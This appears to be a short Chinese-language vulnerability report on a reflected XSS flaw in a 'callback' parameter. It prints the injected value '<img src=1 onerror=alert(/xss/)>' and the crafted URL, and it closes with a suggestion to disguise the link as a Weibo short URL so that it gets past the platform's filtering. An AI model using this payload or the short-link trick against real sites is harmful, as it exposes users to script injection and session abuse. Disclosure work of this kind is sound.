现在不是XSS漏洞盛行的时代,这个漏洞危害比较小,

问题真实存在但是影响不大。

漏洞利用地址:?callback=?<img

利用代码: “src=1 onerror=alert(/xss/)>”

构造的地址是:”?callback=?<img src=1 onerror=alert(/xss/)>“

漏洞证明:看下面的图片。

要我在把链接做成短网址。“。”这样要是在WEIBO发信息的,在通过微薄短网址的净化。这个会更就不错。